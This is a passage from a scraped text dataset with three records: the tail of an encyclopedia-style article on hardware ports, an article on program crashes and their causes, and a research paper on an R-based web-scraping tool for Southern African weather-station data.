pins on the camera side and 6 pins on the computer side, the two power conductors simply being ignored. This is also why laptop computers usually have only 4 pin FireWire ports, as they cannot provide enough power to meet requirements for devices needing the power provided by 6 pin connections. Optical (light) fiber, microwave, and other technologies (i.e., quantum) have different kinds of connections, as metal wires are not effective for signal transfers with these technologies. Optical connections are usually a polished glass or plastic interface, possibly with an oil that lessens refraction between the two interface surfaces. Microwaves are conducted through a pipe, which can be seen on a large scale by examining microwave towers with "funnels" on them leading to pipes. Hardware port trunking (HPT) is a technology that allows multiple hardware ports to be combined into a single group, effectively creating a single connection with a higher Bandwidth sometimes referred to as a double-barrel approach. This technology also provides a higher degree of fault tolerance because a failure on one port may just mean a slow-down rather than a dropout. By contrast, in software port trunking (SPT), two agents (websites, channels, etc.) are bonded into one with the same effectiveness; i.e., ISDN B1 (64K) plus B2 (64K) equals data throughput of 128K. The USB-C standard, published in 2014, supersedes previous connectors and is reversible (although not electrically), meaning it can be plugged both ways. Reversible plugs have a symmetric pinout. Other reversible connectors include Apple's Lightning. 3 4 5 |
206 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Program_crash | In computing, a crash, or system crash, occurs when a computer program such as a software application or an operating system stops functioning properly and exits. On some operating systems or individual applications, a crash reporting service will report the crash and any details relating to it (or give the user the option to do so), usually to the developer(s) of the application. If the program is a critical part of the operating system, the entire system may crash or hang, often resulting in a kernel panic or fatal system error. Most crashes are the result of a software bug. Typical causes include accessing invalid memory addresses, a incorrect address values in the program counter, buffer overflow, overwriting a portion of the affected program code due to an earlier bug, executing invalid machine instructions (an illegal or unauthorized opcode), or triggering an unhandled exception. The original software bug that started this chain of events is typically considered to be the cause of the crash, which is discovered through the process of debugging. The original bug can be far removed from the code that actually triggered the crash. In early personal computers, attempting to write data to hardware addresses outside the system's main memory could cause hardware damage. Some crashes are exploitable and let a malicious program or hacker execute arbitrary code, allowing the replication of viruses or the acquisition of data which would normally be inaccessible. An application typically crashes when it performs an operation that is not allowed by the operating system. The operating system then triggers an exception or signal in the application. Unix applications traditionally responded to the signal by dumping core. Most Windows and Unix GUI applications respond by displaying a dialogue box (such as the one shown to the right) with the option to attach a debugger if one is installed. Some applications attempt to recover from the error and continue running instead of exiting. An application can also contain code to crash b after detecting a severe error. Typical errors that result in application crashes include: A "crash to desktop" is said to occur when a program (commonly a video game) unexpectedly quits, abruptly taking the user back to the desktop. Usually, the term is applied only to crashes where no error is displayed, hence all the user sees as a result of the crash is the desktop. Many times there is no apparent action that causes a crash to desktop. During normal function, the program may freeze for a shorter period of time, and then close by itself. Also during normal function, the program may become a black screen and repeatedly play the last few seconds of sound (depending on the size of the audio buffer) that was being played before it crashes to desktop. Other times it may appear to be triggered by a certain action, such as loading an area. Crash to desktop bugs are considered particularly problematic for users. Since they frequently display no error message, it can be very difficult to track down the source of the problem, especially if the times they occur and the actions taking place right before the crash do not appear to have any pattern or common ground. One way to track down the source of the problem for games is to run them in windowed-mode. Windows Vista has a feature that can help track down the cause of a CTD problem when it occurs on any program. clarification needed Windows XP included a similar feature as well. clarification needed Some computer programs, such as StepMania and BBC's Bamzooki, also crash to desktop if in full-screen, but display the error in a separate window when the user has returned to the desktop. The software running the web server behind a website may crash, rendering it inaccessible entirely or providing only an error message instead of normal content. For example: if a site is using an SQL database (such as MySQL) for a script (such as PHP) and that SQL database server crashes, then PHP will display a connection error. An operating system crash commonly occurs when a hardware exception occurs that cannot be handled. Operating system crashes can also occur when internal sanity-checking logic within the operating system detects that the operating system has lost its internal self-consistency. Modern multi-tasking operating systems, such as Linux, and macOS, usually remain unharmed when an application program crashes. Some operating systems, e.g., z OS, have facilities for Reliability, availability and serviceability (RAS) and the OS can recover from the crash of a critical component, whether due to hardware failure, e.g., uncorrectable ECC error, or to software failure, e.g., a reference to an unassigned page. An Abnormal end or ABEND is an abnormal termination of software, or a program crash. Errors or crashes on the Novell NetWare network operating system are usually called ABENDs. Communities of NetWare administrators sprung up around the Internet, such as abend.org. This usage derives from the ABEND macro on IBM OS 360, ..., z OS operating systems. Usually capitalized, but may appear as "abend". Some common ABEND codes are System ABEND 0C7 (data exception) and System ABEND 0CB (division by zero). 1 2 3 Abends can be "soft" (allowing automatic recovery) or "hard" (terminating the activity). 4 The term is jocularly claimed to be derived from the German word "Abend" meaning "evening". 5 Depending on the application, the crash may contain the user's sensitive and private information. 6 Moreover, many software bugs which cause crashes are also exploitable for arbitrary code execution and other types of privilege escalation. 7 8 For example, a stack buffer overflow can overwrite the return address of a subroutine with an invalid value, which will cause, e.g., a segmentation fault, when the subroutine returns. However, if an exploit overwrites the return address with a valid value, the code in that address will be executed. When crashes are collected in the field using a crash reporter, the next step for developers is to be able to reproduce them locally. For this, several techniques exist: STAR uses symbolic execution, 9 EvoCrash performs evolutionary search. 10 |
207 | https://en.wikipedia.org/wiki/Web_scraping | https://doi.org/10.5334%2Fdsj-2021-024 | The Southern African Science Service Centre for Climate and Land Management (SASSCAL) was initiated to support regional weather monitoring and climate research in Southern Africa. As a result, several Automatic Weather Stations (AWSs) were implemented to provide numerical weather data within the collaborating countries. Meanwhile, access to the SASSCAL weather data is limited to a number of records that are achieved via a series of clicks. Currently, end users can not efficaciously extract the desired weather values. Thus, the data is not fully utilised by end users. This work contributes with an open source Web Scraping Application Programming Interface (WebSAPI) through an interactive dashboard. The objective is to extend functionalities of the SASSCAL Weathernet for: data extraction, statistical data analysis and visualisation. The SASSCAL WebSAPI was developed using the R statistical environment. It deploys web scraping and data wrangling techniques to support access to SASSCAL weather data. This WebSAPI reduces the risk of human error, and the researcher’s effort of generating desired data sets. The proposed framework for the SASSCAL WebSAPI can be modified for other weather data banks while taking into consideration the legality and ethics of the toolkit. Meteorological weather data are useful in filling information needs in academia and industrial settings. The information generated from these data at local levels is useful in complementing: hydrological models (Schuol Abbaspour 2007), high impact weather predictions models (Chang et al. 2013), and simulations of heavy rainfall events (Bopape et al. 2021, Molongwane et al. 2020, Somses et al. 2020) and heatwaves (Moses 2017). Moreover, weather data are also vital for agro-meteorological operations, as well as in efficacious planning of construction and recreational activities. Although there is a huge need of weather or climatological data for Southern Africa, various institutions and enterprises like BIUST, SASSCAL1 and WASCAL2 have introduced AWSs to monitor weather events at finer intervals. However, most of AWSs installed in developing countries are underutilized. For instance, the Botswana Department of Meteorological Services (BDMS)’s mandate is to provide quality weather, climate information and services to enable informed decision making for sustainable socio-economic development in scenarios related to weather and climate. Meanwhile, the BDMS lacks a designated online platform (currently relies on radio stations, television and a Facebook page) to disseminate weather information to the public. On a related note, BIUST identified “Climate and Society” as one of its thematic areas3 of focus. This is geared towards enhancing services related to: climate and impact modeling; early warning, and disaster management for weather and climate change. In 2016, BIUST installed an AWS equipped with a local machine running XConnect for data logging of historical weather data. Likewise, this particular AWS also lacks the backend service layer for dissemination of weather outputs to end users. All these can be seen as barriers and hence limitations of access to the generated weather data. For instance, to request data, clients have to go through some hectic processes. In the case of BIUST, clients have to request data using email, or copy it from the officers using physical storage devices like memory cards. In case of BDMS, end users download and complete a form;4 then submit it to BDMS. The service time is three days long. It is irrefutable that, the demand of climatological data in Southern Africa invites key stake holders (i.e., researchers and developers) and organisations to implement platforms that facilitate ease access and visualisation of climate data. As a result, the Southern African Science Service Centre for Climate and Land Management (SASSCAL) was initiated (Helmschrot, J rg and Muche, GERHARD and Hillmann, THOMAS and Kanyanga, JOSEPH and Butale, MOMPATI and Nascimento, DOMINGOS and Kruger, SALOME and Strohbach, B and Seely, MARY and Ribeiro, CARLOS and others 2015) to support regional weather monitoring and climate research in Southern Africa (Muche, Gerhard and Kruger, Salome and Hillmann, Thomas and Josenhans, Katrin and Ribeiro, Carlos and Bazibi, Mompati and Seely, Mary and Nkonde, Edson and de Clercq, Willem and Strohbach, Ben and others 2018). The SASSCAL Weathernet5 disseminates near to real-time data from AWSs at hourly intervals, including aggregated daily and monthly data (see Figure 1). Visualisation of AWS data via the SASSCAL Weathernet. The SASSCAL weather data is reviewed for quality control before dissemination (Kaspar et al. 2015). These data can also be integrated with data from different sources for research purposes. For instance, Moses et. al. (Oliver L 2018) merged it with other meteorological data from the BDMS to analyse effects of solar radiation, wind speed and humidity on evapo-transpiration around the Okavango Delta. Similarly, predictive data analysis and modeling of temperature patterns (Thapelo 2014, Thapelo Jamisola 2019) is vital in the understanding of heatwaves (Moses 2017); while rainfall values can help in assessing rainfall erosivity (Singh Singh 2020). Despite the distinct potential use of the SASSCAL weather data, there is a burden on the end users to access, download and use such data in research (see Figure 2). First, the user has to navigate to the SASSCAL Weathernet to identify a country, AWS of interest, and the temporal resolution of the weather data. The user can then manually copy and paste the whole data to a storage file for data analysis. There is an option to download the SASSCAL weather data in excel format only. However, there is no option to only select the desired weather values from AWSs of interest. Even after downloading the weather data, end users face a challenge of generating clean data sets containing the desired variables for further use. The situation worsens when extracting finer temporal data from multiple AWSs across the entire region. Manually extracting data from the SASSCAL Weathernet. This process is costly, time consuming and error-prone. This work presents the SASSCAL Web Scraping Application Programming Interface (WebSAPI). Web scraping (Munzert et al. 2014) is a data science technique that deploys scripts for extraction of structured data from websites. A script is a computer program that automates a specific task using some selected programming languages like R or Python. Thus, a WebSAPI can be seen as an application service that allows access to online data for further use in research projects. By digitalising the BDMS’ form in 4 for climate data requests, this work will be enabling end users to efficaciously (1) access and visualise weather data from the SASSCAL Weathernet; and (2) download desired data for use in data driven projects. The structure of the work is as follows. Section II provides a brief background information to this work. Section III presents the approach deployed in the development of the SASSCAL WebSAPI. Section IV presents results. It also illustrates how the SASSCAL WebSAPI can be used to support the extraction of weather variables, as well as the visualisation and dissemination of the generated outputs. Lastly, section V and VI present discussions and conclusions. Most of African countries (Tufa et al. 2014) like Botswana (Nkemelang et al. 2018) are lagged behind in terms of climate informatics (Vyacheslav et al. 2019) and environmental data science (Gibert et al. 2018, Vyacheslav et al. 2019). This can be attributed to lack of readily available platforms and data as also pointed out in (Schuol Abbaspour 2007, Tufa et al. 2014). All these bottlenecks can be unlocked by integrating computing technologies like web scraping and dashboard applications. Web scraping techniques have been widely deployed in a number of projects from different disciplines such as economics (Robert Paul 2020) and climate science (Yang et al. 2010). Regardless of the discipline, the general idea is to allow greater visibility, access, extraction and usability of the online data. This work contributes by addressing the second “pillar” of the Global Framework for Climate Services (Vaughan et al. 2016) using climate informatics. This WebSAPI is motivated by authors in (Bonifacio et al. 2015) who presented a free tool for automated extraction and consolidation of climate data from different online web data banks. A similar work by Yang et al. (Yang et al. 2010) presented a system with functionalities for scraping, filtering and visualising climatic data for easy use. This work is related to Ref (Sitterson et al. 2020) regarding the user API for data request. It is also related to (Bonifacio et al. 2015) in such it deconstructs the URL for a given station and then modifies the date range and the desired temporal resolution to extract desired weather data. Web scraping is still emerging, with no dominant standards at current. This technology also presents a combination of ethical and legal challenges (Krotov Vlad and Johnson Leigh and Silva Leiser 2020, Mason 1986) that necessitates standards to support data exchange. The ethical issues attached to web scraping can be summed into four generic groups: property, privacy, accessibility and accuracy (Mason 1986). Web scrappers can also compete with the main data provider APIs, which might diminish the value of the organisation’s intended mission (Hirschey 2014). For instance, if a web scrapper attracts more clients than the intended main API, then end users might end up neglecting the platform of that organisation. All these invite multi-disciplinary collaboration (i.e., government sectors, academia and industrial practitioners) to establish standards and boundaries for technology usage. This could irrefutably catalyse the development and adoption of the generated data driven outputs as also supported in (Fundel et al. 2019, Katz Murphy 2005). The first task was to identify the data sources, and the SASSCAL Weathernet came to the rescue. The aim of the SASSCAL WebSAPI is to improve data accessibility and visualisation of the SASSCAL Weather data before data analysis and predictive modeling. The target of this work was to develop and implement independent algorithms that can, later on, be consolidated and integrated into a package for data driven projects requiring SASSCAL weather data. The SASSCAL WebSAPI comprises of modularised algorithms packaged into scripts to enable direct control of weather data provided by the SASSCAL weathernet. This include but not limited to algorithms targeted at: processing the SASSCAL Weathernet link; determining the pages containing relevant weather data; deconstructing and parsing contents of the HTML file; extracting required weather data from selected pages; combining data (i.e., data wrangling) into data frames to generate data sets and visuals; as well as sharing the generated outputs using interactive dashboards. The SASSCAL Weathernet enables the public to use one domain to access the AWS data. Each SASSCAL country member has various AWSs, each with a unique identifier (ID). Access to the data is defined using the same abstract pattern. In essence, one can query the website’s database for any AWS within the SASSCAL region by providing the corresponding URL. Thus, one can extract the weather data via a tailored API using formats like HTML and XML. The home page URL for each SASSCAL AWS data is defined by: x y?z; where x is the preamble in link 5; y is just the weatherstat AO we.php token that defines the weather statistics for a given resolution (monthly, daily or hourly); and z is the string describing the logger ID (loggerid crit n), where n is the AWS’ unique ID. Tables containing relevant data are found by trial and error (i.e., by inspect individual elements of the SASSCAL weathernet page), or just exploring the source code of the web page. This work deploys the workflow depicted in Figure 3 following the data science approach in (Bradley James 2019, Hadley Garrett 2016) using open-source platforms (i.e., R version 4.0.3 and RStudio 1.1.463). Thus, the algorithms are coded in R, and the functions are tested using the RMarkdown which facilitates reproducibility. R has excellent packages for statistical data science and visualisation. Table 1 shows packages deployed in this work. Workflow of the SASSCAL WebSAPI. Table 1 R packages proposed in this work. A helper function (helper.R) is scripted to install and load the packages included in Table 1. The rvest (Wickham Wickham 2016) package is required for web scraping; while the XML (Lang Lang 2015) is required for XML document processing. The ggplot2 (Wickham 2011) is used for data visualisation. The Shiny (Chang et al. 2015) and Flexdashboard (Allaire 2017) packages are used to design the WebSAPI’s dashboard. The htmlwidgets framework is deployed to provide high-level R bindings to the JavaScript libraries for data visualization. All these functions are embedded in a reproducible RMarkdown to implement the proposed SASSCAL WebSAPI. The data driven pipeline used in this work is summarised in Figure 3. Algorithm 1 implements an interactive map to visualise where the AWSs are located geographically. Here, w is a vector of AWSs for a given country, x and y are vectors of the latitude and longitude coordinates of the AWSs, z is a vector detailing the descriptions of a given AWS. The algorithm also allows users to select specific AWSs; thanks to the leaflet package. In Algorithm 1, the dataframe c’ defining the inputs is piped into the leaflet function to automatically generate an auto-size map that fits markers of all AWSs. This function also adds some bounds in (Line 4) so that the user can’t scroll too far away from the markers of AWSs. The interactive map pops up the name of the AWS as the user hovers the mouse over a marker. This simple functionality is crucial for end users (i.e., researchers) since it provides spatio-visual exploration of AWSs that are supported by the SASSCAL weathernet. Algorithm 1 Visualise the AWSs of a given country. The web scraping functionality in Algorithm 2 uses the All AWS ID.R script to construct vectors and store names and IDs of AWSs. The AWS ID Getter function assigns an AWS name (i.e., “x”) to its corresponding ID (i.e., “value”) using a hash map function (see Line 7 and 8). Thus, to find the ID for a given AWS of interest, the function looks-it-up into the hash function and retrieves the address of that AWS’ ID. Algorithm 2 Data scraper. The AWS name, ID and date are then used to construct a URL used to fetch the data by the DataHaverster.R function in Algorithm 3. The DataHarveter takes in a URL to a given AWS. The URL string can be partitioned into tokens (i.e., using just the AWS name and date) to facilitate easy input. Algorithm 3 Data harvesting. The XML package (Lang Lang 2013) was used to parse a given URL and create a Document Object Model (DOM). This XML package uses the readHTMLTable() function to specify the weather data to select from the HTML tables in the SASSCAL Weathernet. The number of tables for a given DOM was determined using R’s built-in length() function. There are three DOM instances for each temporal resolution; each with multiple tables. There are 14 tables in the DOM corresponding to the web page with hourly data, and the values of interest are in the 13th table. The DOM for the web page with daily observations has 13 tables, and daily values of interest are in the 12th table. The last DOM has 18 tables with monthly data contained in the 10th table. Line 3 in Algorithm 3 facilitates the cleaning and selection of desired weather tables using the parameter (i.e., can be 13, 12 or 10 as discussed above). The parameter defines the extensions to fix the columns of a table to be visualised; while defines extra options for buttons to facilitate end users to search, scroll, copy and download the weather data visualised via the table. The DataWrangler() function was implemented to iterate through the table containing dates of observations. It uses the argument to determine the date range for the data of interest. The extracted weather data is then unified into a single data frame to generate data sets for further use as illustrated in Figures 4 and 5 in section IV. Visualising Botswana AWS using Algorithm 1. Screenshot of the SASSCAL WebSAPI for capturing user input when requesting weather data. The GUI allows end users to select the geographical location of interest (i.e., Botswana), temporal resolution, the AWS of interest and the downloading of data. The functionality of multi-input selection of AWSs provides end users with a feedback mechanisms to notify about the selected AWS as seen on the tab titled “Currently Selected AWS. This is quite useful for a quick exploration of geographic locations before downloading data. Algorithm 4 implements functionalities for the dashboard page. This include the dashboardHeader() to define the title; and the dashboardSidebar() to define two functionalities of visualising the tables of numerical weather data from an AWS of a given country. The dashboardBody() facilitates selection of the AWS, the resolution, date range, use of data, and weather values and the functionality to also export data. Since different end users have different user needs, this work does not develop a complete GUI. Interested readers should see Ref (Robert Paul 2020) for completing a dashboard API. Algorithm 4 Dashboard design for dissemination. This work documents the development process of a lightweight WebSAPI capable of extracting and displaying timely weather data based on the SASSCAL weathernet. The WebSAPI is cost-effective since it is powered by open source technologies. Besides the functionalities of extracting numerical data, the WebSAPI’s tasks were expanded to include visuals using other formats like tables, maps, and charts. Figure 4 shows an interactive map generated using Algorithm 1. The interactive map can pop-up the name of the AWS as the user hovers the mouse over a marker. The algorithms defined in section III-E only scrape data from one AWS at a time. These can be extend by adding a functionality to specify multiple AWSs then use a for loop function to scrape desired weather data as shown in Figure 6. Screenshot of the SASSCAL WebSAPI’s GUI for data request, visualisation and extraction of data. In addition to selecting the desired AWS, temporal resolution, and the date range, the SASSCAL WebSAPI’s GUI allows end users to select the desired variables. In this work, a data driven template was developed in the form of a WebSAPI to facilitate efficacious interaction with the outputs generated by the SASSCAL weathernet. The SASSCAL WebSAPI implements modularised algorithms to collect the SASSCAL weather data and generate high-quality data sets that can be used in data driven projects. Modularised scripts facilitate an efficient product design process that integrates any efforts related to idea generation, concept development, and, modification of existing systems and platforms to develop proper solutions. This section presents discussions regarding the data quality, legal aspects, limitations and implications of the proposed WebSAPI. The SASSCAL Weathernet data is checked for quality control as mentioned in Ref (Kaspar et al. 2015). This gives an “assurance” that the SASSCAL WebSAPI will provide quality data that would not mislead end users (i.e, researchers, or decision makers). However, users should note that due to occasional sensor faults, the correctness of data values cannot be fully guaranteed as also indicated in the SASSCAL Weathernet.6 The declaration on SASSCAL data use indicates that free use is granted for non-commercial and educational purposes. Although there are no explicit restrictions on data scraping on the SASSCAL Weathernet, it is difficult to conclude that SASSCAL encourages end users to automatically scrape and extract data using tailor made APIs. This can be justified by the note “For data requests regarding specific countries, stations, time periods or specific sensors please contact oadc-datarequest sasscal.org” as shown in.7 It should be noted that the underlined aspects are the challenges proposed to be addressed through this work. Thus, personal APIs that pro-grammatically extract the weather data by bypassing the designated SASSCAL Weathernet API can be seen as presenting slight ethical dilemma for developers. The main hurdle relates to identifying and integrating appropriate data driven technologies to facilitate flexible access and visualisation of the SASSCAL weather data. In this regard, a couple of algorithms have been completed and tested to optimise the task of web scraping. However, the taks of retrieving weather data was tested using relatively small dataset (94 instances). The small data set were chosen to ensure that the automatic scraping and retrieving of data does not likely damage or slow down the SASSCAL website’s servers. This toolkit is built on top of the SASSCAL Weathernet. Thus, changes in structural representation of SASSCAL Weathernet implies modifying the WebSAPI. There is no free lunch in problem solution. The process of web scraping and dashboard design is iterative and evolutionary. The integration of R, flexdashboard and Shiny allows the development and deployment of interactive apps. However, before starting a web scraping based data driven project, developers should start by analysing associated legality and ethics (Krotov Vlad and Johnson Leigh and Silva Leiser 2020, Mason 1986) to avoid possible bottlenecks. The contribution of this work is rather pragmatic than theoratical. The WebSAPI is flexible and reproducible, with potential to be scaled up (expanded) to address other functionalities related to the use of SASSCAL weather data. Reproducibility is an important aspect in open science research and API development. This helps to reduce time taken for data collection, development and testing since the independent components (algorithms) have been already tried and tested. This approach has potential to catalyse the development of packages from existing platforms to meet the end user requirements. It should be noted that neither the BDMS nor BIUST have an API to disseminate weather information. This WebSAPI is still under development, yet with potential to be adapted and incorporated to portals of weather service providers (BIUST, BDMS, SASSCAL, and WASCAL) to bridge gaps of weather and climate data access. Developing and implementing a data driven platform to serve end users is a challenging task that requires input from multidisciplinary stake holders. This work integrated web scraping (Munzert et al. 2014), data wrangling and dashboard techniques to develop a lightweight SASSCAL WebSAPI. In comparison to previous web scraping literature, this work takes into consideration that data driven outputs need to be disseminated to end users. In this case, a dashboard proto-type was developed in RMarkdown to facilitate reproducibility. The WebSAPI is expected to create new channels to extend services of the SASSCAL Weathernet. By enabling efficacious and efficient data access, the SASSCAL WebSAPI has potential to increase productivity and quality of data driven projects that make use of SASSCAL weather data. The SASSCAL WebSAPI should be seen not as a replacement but rather a complementary toolkit to the SASSCAL Weathernet. It does not cover all the tasks related to “weather data science”, but it provides the end-user community with the opportunity to reproduce it and develop in-depth product development skills to ultimately add more functionalities to a related API. In terms of extending this work, more end-user driven functionalities will be added to this API to enable data driven operations and services like investigating strategies for imputation of missing data, and modelling. The collaboration with the concerned stakeholders (i.e, SASSCAL, BDMS, BIUST), including end users (researchers, students, and farmers) could catalyse the development and deployment process. This will surely enhance operational productivity while maximizing utilization of these amazing open-source technologies. Efforts from this work are likely to spawn new projects and collaboration that will better inform citizens and continue to help them to make use of the generated data, and contribute to the open-data community. This R based toolkit is still under development. Parallel to this manuscript is a reproducible tutorial in RMarkdown, integrating Shiny and Flexdashboard for visualisation and dissemination of outputs. The tutorial and code is available on https: github.com EL-Grande SASSACL-WebSAPI and the data is available online 5. https: www.sasscal.org . https: wascal.org . www.biust.ac.bw research thematic-areas-platforms . https: www.gov.bw natural-resources request-climatological-data. http: www.sasscalWeathernet.org . http: www.sasscalWeathernet.org imprint we.php. http: www.sasscalWeathernet.org contact we.php. BIUST: for the partial financial support (with reference number: S 00086); and SASSCAL for availing the data. The authors have no competing interests to declare. Thapelo TS: Conceptualization, Methodology, Resources, Application Development, Writing (Original Draft Preparation; Review and Editing); Namoshe M: Conceptualization, Resources, Formal Analysis, Review and Editing; Matsebe O: Conceptualization, Resources, Formal Analysis, Review and Editing; Motshegwa T: Resources, Formal Analysis, Review and Editing; Bopape MJM: Resources, Formal Analysis, Review and Editing. Allaire, J. 2017. Flexdashboard: R markdown format for flexible dashboards. Bonifacio, C, Barchyn, TE, Hugenholtz, CH and Kienzle, SW. 2015. CCDST: A free Canadian climate data scraping tool. Computers Geosciences, 75: 13 16. DOI: https: doi.org 10.1016 j.cageo.2014.10.010 Bopape, M-JM, Waitolo, D, Plant, RS, Phaduli, E, Nkonde, E, Simfukwe, H, Mkandawire, S, Rakate, E and Maisha, R. 2021. Sensitivity of Simulations of Zambian Heavy Rainfall Events to the Atmospheric Boundary Layer Schemes. Climate, 9(2): 38. DOI: https: doi.org 10.3390 cli9020038 Bradley, A and James, RJ. 2019. Web scraping using R. Advances in Methods and Practices in Psychological Science, 2(3): 264 270. DOI: https: doi.org 10.1177 2515245919859535 Chang, EK, Pe a, M and Toth, Z. 2013. International research collaboration in high-impact weather prediction. Bulletin of the American Meteorological Society, 94(11): ES149 ES151. DOI: https: doi.org 10.1175 BAMS-D 13 00057.1 Chang, W, Cheng, J, Allaire, J, Xie, Y and McPherson, J. 2015. Package shiny’. See http: citeseerx.ist.psu.edu viewdoc download. Dowle, M, Srinivasan, A, Gorecki, J, Chirico, M, Stetsenko, P, Short, T, Lianoglou, S, Antonyan, E, Bonsch, M, Parsonage, H, et al. 2019. Package data. table’. Extension of data.frame’. Dreyer, A and Stockton, J. 2013. Internet “data scraping”: A primer for counseling clients. New York Law Journal, 7: 1 3. Fundel, VJ, Fleischhut, N, Herzog, SM, G ber, M and Hagedorn, R. 2019. Promoting the use of probabilistic weather forecasts through a dialogue between scientists, developers and end-users. Quarterly Journal of the Royal Meteorological Society, 145: 210 231. DOI: https: doi.org 10.1002 qj.3482 Gibert, K, Izquierdo, J, S nchez-Marr , M, Hamilton, SH, Rodr guez-Roda, I and Holmes, G. 2018. Which method to use? An assessment of data mining methods in Environmental Data Science. Environmental Modelling Software, 110: 3 27. Special Issue on Environmental Data Science. Applications to Air quality and Water cycle. 2. DOI: https: doi.org 10.1016 j.envsoft.2018.09.021 Graul, C and Graul, MC. 2016. Package leafletr”. Hadley, W and Garrett, G. 2016. R for data science: import, tidy, transform, visualize, and model data. O’Reilly Media, Inc. Helmschrot, J, Muche, G, Hillmann, T, Kanyanga, J, Butale, M, Nascimento, D, Kruger, S, Strohbach, B, Seely, M, Ribeiro, C, others. 2015. SASSCAL WeatherNet to support regional weather monitoring and climate-related research in Southern Africa. Proceedings of the International Association of Hydrological Sciences, 366: 170 171. DOI: https: doi.org 10.5194 piahs 366 170 2015 Hirschey, JK. 2014. Symbiotic relationships: Pragmatic acceptance of data scraping. Berkeley Tech. LJ, 29: 897. DOI: https: doi.org 10.2139 ssrn.2419167 Ives, B and Krotov, V. 2006. Anything you search can be used against you in a court of law: Data mining in search archives. Communications of the Association for Information Systems, 18(1): 29. DOI: https: doi.org 10.17705 1CAIS.01829 Kaspar, F, Helmschrot, J, Mhanda, A, Butale, M, de Clercq, W, Kanyanga, J, Neto, F, Kruger, S, Castro Matsheka, M, Muche, G, et al. 2015. The SASSCAL contribution to climate observation, climate data management and data rescue in Southern Africa. Advances in science and research, 12: 171 177. DOI: https: doi.org 10.5194 asr 12 171 2015 Katz, RW and Murphy, AH. 2005. Economic value of weather and climate forecasts. Cambridge University Press. Krotov, V, Leigh, J and Leiser, S. 2020. Tutorial: Legality and Ethics of Web Scraping. Communications of the Association for Information Systems, 47(1): 22. DOI: https: doi.org 10.17705 1CAIS.04724 Lang, DT and Lang, MDT. 2013. Package xml’. Lang, DT and Lang, MDT. 2015. Package XML’. DOI: https: doi.org 10.2307 248873 Mason, RO. 1986. Four ethical issues of the information age. MIS quarterly, 5 12. DOI: https: doi.org 10.2307 248873 Molongwane, C, Bopape, M-JM, Fridlind, A, Motshegwa, T, Matsui, T, Phaduli, E, Sehurutshi, B and Maisha, R. 2020. Sensitivity of Botswana Ex-Tropical Cyclone Dineo rainfall simulations to cloud microphysics scheme. AAS Open Research, 3(30): 30. DOI: https: doi.org 10.12688 aasopenres.13062.1 Moses, O. 2017. Heat wave characteristics in the context of climate change over past 50 years in Botswana. Botswana Notes and Records; ub.bw index.php bnr . Muche, G, Kruger, S, Hillmann, T, Josenhans, K, Ribeiro, C, Bazibi, M, Seely, M, Nkonde, E, de Clercq, W, Strohbach, B, others. 2018. SASSCAL WeatherNet: present state, challenges, and achievements of the regional climatic observation network and database. Biodiversity Ecology, 6: 34 43. DOI: https: doi.org 10.7809 b-e.00302 Munzert, S, Rubba, C, Meissner, P and Nyhuis, D. 2014. Automated data collection with R: A practical guide to web scraping and text mining. John Wiley Sons. DOI: https: doi.org 10.1002 9781118834732 Nkemelang, T, New, M and Zaroug, M. 2018. Temperature and precipitation extremes under current, 1.5 C and 2.0 C global warming above pre-industrial levels over Botswana, and implications for climate change vulnerability. Environmental Research Letters, 13(6): 065016. DOI: https: doi.org 10.1088 1748 9326 aac2f8 Oliver, M and Hambira, WL. 2018. Effects of climate change on evapotranspiration over the Okavango Delta water resources. Physics and Chemistry of the Earth, Parts A B C, 105: 98 103. DOI: https: doi.org 10.1016 j.pce.2018.03.011 Robert, S and Paul, S. 2020. Making health economic models Shiny: A tutorial. Wellcome Open Research, 5(69): 69. DOI: https: doi.org 10.12688 wellcomeopenres.15807.2 Schuol, J and Abbaspour, K. 2007. Using monthly weather statistics to generate daily data in a SWAT model application to West Africa. Ecological modeling, 201(3 4): 301 311. DOI: https: doi.org 10.1016 j.ecolmodel.2006.09.028 Singh, J and Singh, O. 2020. Assessing rainfall erosivity and erosivity density over a western Himalayan catchment, India. Journal of Earth System Science, 129(1): 1 22. 2. DOI: https: doi.org 10.1007 s12040 020 1362 8 Sitterson, J, Sinnathamby, S, Parmar, R, Koblich, J, Wolfe, K and Knightes, CD. 2020. Demonstration of an online web services tool incorporating automatic retrieval and comparison of precipitation data. Environmental Modelling Software, 123: 104570. DOI: https: doi.org 10.1016 j.envsoft.2019.104570 Somses, S, Bopape, M-JM, Ndarana, T, Fridlind, A, Matsui, T, Phaduli, E, Limbo, A, Maikhudumu, S, Maisha, R and Rakate, E. 2020. Convection Parametrization and Multi-Nesting Dependence of a Heavy Rainfall Event over Namibia with Weather Research and Forecasting (WRF) Model. Climate, 8(10): 112. DOI: https: doi.org 10.3390 cli8100112 Thapelo, ST. 2014. T cnicas de aprendizaje automatizado para el pron stico de temperaturas min mas en el Centro Meteorol gico de Villa Clara, Santa Clara, PhD thesis, Universidad Central “Marta Abreu” de Las Villas. Thapelo, TS and Jamisola, RS. 2019. Machine learning for maximum and minimum temperature analytics and prediction at local level. Tufa, D, Paul, B, Jessica, S, Kinfe, H, Daniel, O, del Corral, J, Cousin, R and Thomson, MC. 2014. Bridging critical gaps in climate services and applications in Africa. Earth Perspectives, 1(1): 15. DOI: https: doi.org 10.1186 2194 6434 1 15 Vanderkam, D, Allaire, J, Owen, J, Gromer, D, Shevtsov, P and Thieurmel, B. 2015. dygraphs: Interface to’Dygraphs’ Interactive Time Series Charting Library. R package version 0.5. Vyacheslav, L, Andrew, R and Samuel, S. 2019. Statistics for climate informatics. Environmetrics, 30(4). DOI: https: doi.org 10.1002 env.2567 Wickham, H. 2011. ggplot2. Wiley Interdisciplinary Reviews: Computational Statistics, 3(2): 180 185. Wickham, H and Wickham, MH. 2016. Package rvest’. URL: https: cran.r-project.org web packages rvest rvest.pdf. DOI: https: doi.org 10.1002 wics.147 Wickham, H and Wickham, MH. 2019. Package stringr’. Yang, Y, Wilson, L and Wang, J. 2010. Development of an automated climatic data scraping, filtering and display system. Computers and Electronics in Agriculture, 71(1): 77 87. DOI: https: doi.org 10.1016 j.compag.2009.12.006 |
